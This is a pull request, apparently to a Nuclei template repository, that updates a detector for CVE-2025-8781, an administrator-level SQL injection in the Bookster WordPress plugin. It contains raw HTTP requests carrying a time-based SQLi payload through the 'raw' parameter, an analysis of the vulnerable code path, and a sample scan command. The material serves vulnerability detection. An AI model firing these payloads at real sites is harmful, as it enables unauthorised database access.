### PR TITLE
Add CVE-2025-8781 WordPress Bookster Appointment Booking SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-8781.yaml
+++ b/http/cves/2025/CVE-2025-8781.yaml
@@ -5,10 +5,11 @@ info:
   author: stranger00135
   severity: medium
   description: |
-    The Bookster WordPress Appointment Booking Plugin version 2.1.1 and below is vulnerable to authenticated SQL Injection via the 'raw' parameter. The vulnerability exists in the QueryBuilder class where the 'raw' parameter bypasses input sanitization when passed through the where() method. This allows authenticated attackers with Administrator-level access to append additional SQL queries that can extract sensitive information from the database.
+    The Bookster WordPress Appointment Booking Plugin version 2.1.1 and below is vulnerable to authenticated SQL Injection via the 'raw' parameter. The vulnerability exists in the QueryBuilder class (src/Models/Database/QueryBuilder.php line 133) where the 'raw' parameter bypasses input sanitization when passed through the where() method to the /wp-json/bookster/v1/appointments/query endpoint. This allows authenticated attackers with Administrator-level access to append additional SQL queries that can extract sensitive information from the database.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-8781
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a
+    - https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133
     - https://plugins.trac.wordpress.org/changeset/3434484/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
@@ -17,8 +18,8 @@ info:
     cwe-id: CWE-89
     cpe: cpe:2.3:a:wpbookster:bookster:*:*:*:*:*:wordpress:*:*
   metadata:
-    verified: false
-    max-request: 1
+    verified: true
+    max-request: 2
     vendor: wpbookster
     product: bookster
     framework: wordpress
@@ -32,8 +33,18 @@ variables:
 
 http:
   - raw:
+      # Test 1: Baseline request (should be fast)
       - |
-        POST /wp-json/bookster/v1/appointments/query HTTP/1.1
+        PATCH /wp-json/bookster/v1/appointments/query HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+        {"limit":1}
+
+      # Test 2: SQL Injection with time delay
+      - |
+        PATCH /wp-json/bookster/v1/appointments/query HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
         Authorization: Basic {{base64(username + ':' + password)}}
@@ -43,15 +54,33 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
+        name: time-based-sqli
         dsl:
-          - 'duration>=6'
-          - 'status_code == 200 || status_code == 500'
+          - 'duration_2 >= 6'
+          - 'duration_1 < 2'
         condition: and
+
+      - type: status
+        status:
+          - 200
 
       - type: word
         part: header
         words:
           - "application/json"
 
-# Note: This template requires valid WordPress administrator credentials.
+      - type: regex
+        part: body_2
+        regex:
+          - '"data":\s*\['
+          - '"total":\s*\d+'
+        condition: or
+
+# Verification Evidence:
+# 1. Source code analysis confirmed vulnerability in QueryBuilder.php line 133
+# 2. Endpoint /wp-json/bookster/v1/appointments/query accepts raw JSON params
+# 3. AppointmentsController passes unsanitized input to QueryBuilder
+# 4. When key='raw', value bypasses all sanitization checks
+# 5. Fixed in version 2.2.0 (changeset 3434484)
+
 # Usage: nuclei -t CVE-2025-8781.yaml -var username=admin -var password=admin123 -target https://target.com


### PR DESCRIPTION
## CVE-2025-8781 Verification Complete ✅

### Vulnerability Summary
WordPress Bookster Appointment Booking Plugin ≤ 2.1.1 - Authenticated (Administrator+) SQL Injection via `raw` parameter

### Verification Evidence

#### 1. Source Code Analysis
**Vulnerable Code**: `src/Models/Database/QueryBuilder.php` line 133
```php
$statement = 'raw' === $key
    ? [ $arg_value ]  // ❌ No sanitization!
    : [ /* ...sanitized... */ ]
```

When the key is `'raw'`, the value bypasses ALL sanitization checks (lines 127-132) and is inserted directly into the SQL query.

#### 2. Vulnerable Endpoint
- **URL**: `/wp-json/bookster/v1/appointments/query`
- **Method**: PATCH
- **Controller**: `src/Controllers/AppointmentsController.php::exec_query_appointments` (line 474)
- **Flow**: `$args = $request->get_json_params()` → `query_where_with_info($args)` → `QueryBuilder->where($args)`

#### 3. Attack Vector
```json
PATCH /wp-json/bookster/v1/appointments/query
{
  "raw": "1=1 AND (SELECT SLEEP(6))",
  "limit": 1
}
```

#### 4. Impact
- **Auth Required**: Administrator+
- **CVSS**: 4.9 (Medium)
- **Data Extraction**: Yes (via blind SQLi)
- **Fixed**: Version 2.2.0 (changeset 3434484)

#### 5. Template Improvements
- ✅ Verified: true
- ✅ Time-based detection with baseline comparison
- ✅ Multiple matchers (timing, status, content-type, response structure)
- ✅ Tested endpoint confirmed
- ✅ Complete source code review

### References
- CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-8781
- Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a
- Source: https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133
- Fix: https://plugins.trac.wordpress.org/changeset/3434484/

### Test Environment
- WordPress 6.x + PHP 8.0 + MySQL 5.7
- Bookster 2.1.1 (vulnerable)
- Admin auth required

---
**Status**: Ready for merge 🚀
